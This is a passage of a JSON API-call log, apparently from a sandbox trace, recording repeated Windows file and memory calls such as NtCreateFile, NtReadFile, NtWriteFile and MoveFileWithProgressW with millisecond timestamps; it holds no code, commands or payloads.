"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,342", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,352", "api": "NtFreeVirtualMemory"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,362", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,382", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,382", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,382", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,382", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:02,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:42:02,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,472", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,482", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,522", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:02,562", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:02,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:02,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,843", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 